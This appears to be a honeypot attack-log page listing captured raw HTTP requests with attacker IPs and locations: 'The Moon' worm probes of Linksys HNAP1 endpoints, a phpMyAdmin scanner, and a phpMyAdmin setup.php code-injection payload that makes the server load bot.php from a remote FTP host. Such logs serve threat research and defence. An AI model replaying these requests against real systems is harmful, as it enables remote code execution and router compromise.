This website uses cookies to improve user experience. By using this website you consent to all cookies in accordance with our terms.

Dismiss
Click here for some search hints
1-10 of 6218027 results (621803 pages)

Linksys "The Moon" Worm

[Attack info]
Attacker: 130.180.218.89
Dest. port: 8080
Time: 29/05/2020 16:14:44
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS31343 Intertelecom Ltd
Location: Kyiv City, Kyiv (zipcode 02002)
POST /HNAP1/ HTTP/1.0 Content-Length: 337 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetRouterSettings" Host: 2.133.90.78:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://2.133.90.78:8080/ authorization: Basic Og== <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetRouterSettings xmlns="http://purenetworks.com/HNAP1/"> </GetRouterSettings> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 130.180.218.89
Dest. port: 8080
Time: 29/05/2020 16:14:44
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS31343 Intertelecom Ltd
Location: Kyiv City, Kyiv (zipcode 02002)
POST /HNAP1/ HTTP/1.0 Content-Length: 329 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetWLanRadios" Host: 2.133.90.78:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://2.133.90.78:8080/ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetWLanRadios xmlns="http://purenetworks.com/HNAP1/"> </GetWLanRadios> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 130.180.218.89
Dest. port: 8080
Time: 29/05/2020 16:14:42
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS31343 Intertelecom Ltd
Location: Kyiv City, Kyiv (zipcode 02002)
POST /HNAP1/ HTTP/1.0 Content-Length: 329 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/IsDeviceReady" Host: 2.133.90.78:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://2.133.90.78:8080/ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <IsDeviceReady xmlns="http://purenetworks.com/HNAP1/"> </IsDeviceReady> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 130.180.218.89
Dest. port: 80
Time: 29/05/2020 16:14:42
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS31343 Intertelecom Ltd
Location: Kyiv City, Kyiv (zipcode 02002)
POST /HNAP1/ HTTP/1.0 Content-Length: 331 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetWanSettings" Host: 2.133.90.78 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://2.133.90.78/ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetWanSettings xmlns="http://purenetworks.com/HNAP1/"> </GetWanSettings> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 130.180.218.89
Dest. port: 80
Time: 29/05/2020 16:14:39
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS31343 Intertelecom Ltd
Location: Kyiv City, Kyiv (zipcode 02002)
POST /HNAP1/ HTTP/1.0 Content-Length: 345 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetRouterLanSettings2" Host: 2.133.90.78 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://2.133.90.78/ authorization: Basic Og== <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetRouterLanSettings2 xmlns="http://purenetworks.com/HNAP1/"> </GetRouterLanSettings2> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 130.180.218.89
Dest. port: 80
Time: 29/05/2020 16:14:38
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS31343 Intertelecom Ltd
Location: Kyiv City, Kyiv (zipcode 02002)
POST /HNAP1/ HTTP/1.0 Content-Length: 337 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetRouterSettings" Host: 2.133.90.78 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://2.133.90.78/ authorization: Basic Og== <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetRouterSettings xmlns="http://purenetworks.com/HNAP1/"> </GetRouterSettings> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 130.180.218.89
Dest. port: 80
Time: 29/05/2020 16:14:37
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS31343 Intertelecom Ltd
Location: Kyiv City, Kyiv (zipcode 02002)
POST /HNAP1/ HTTP/1.0 Content-Length: 329 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetWLanRadios" Host: 2.133.90.78 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://2.133.90.78/ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetWLanRadios xmlns="http://purenetworks.com/HNAP1/"> </GetWLanRadios> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 130.180.218.89
Dest. port: 80
Time: 29/05/2020 16:14:33
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS31343 Intertelecom Ltd
Location: Kyiv City, Kyiv (zipcode 02002)
POST /HNAP1/ HTTP/1.0 Content-Length: 329 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/IsDeviceReady" Host: 2.133.90.78 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://2.133.90.78/ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <IsDeviceReady xmlns="http://purenetworks.com/HNAP1/"> </IsDeviceReady> </soap:Body> </soap:Envelope>

phpMyAdmin scanner

[Attack info]
Attacker: 111.70.0.155
Dest. port: 80
Time: 27/05/2020 01:15:11
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS17421 Mobile Business Group
Location: Taiwan, Taipei
rDNS: 111-70-0-155.emome-ip.hinet.net
GET /phpmyadmin/ HTTP/1.1 Host: 2.133.90.78 connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36

phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit

[Attack info]
Attacker: 95.110.227.41
Dest. port: 80
Time: 05/10/2019 22:05:43
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31034 Aruba S.p.A.
Location: Tuscany, Arezzo (zipcode 52100)
rDNS: host41-227-110-95.serverdedicati.aruba.it
POST /phpMyAdmin/scripts/setup.php HTTP/1.1 Content-Length: 234 cookie2: $Version="1" Host: 105.156.24.33 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en] connection: TE referer: http://105.156.24.33/phpMyAdmin/scripts/setup.php cookie: phpMyAdmin=2e43e013731e676c3502e227ca71d7da te: deflate,gzip;q=0.3 Content-Type: application/x-www-form-urlencoded action=lay_navigation&eoltype=unix&token=a74bbbb1ba8ffc7009b69e36bcfd6dd6&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A27%3A%22ftp%3A%2F%2F95%2E110%2E227%2E41%2Fbot%2Ephp%22%3B%7D%7D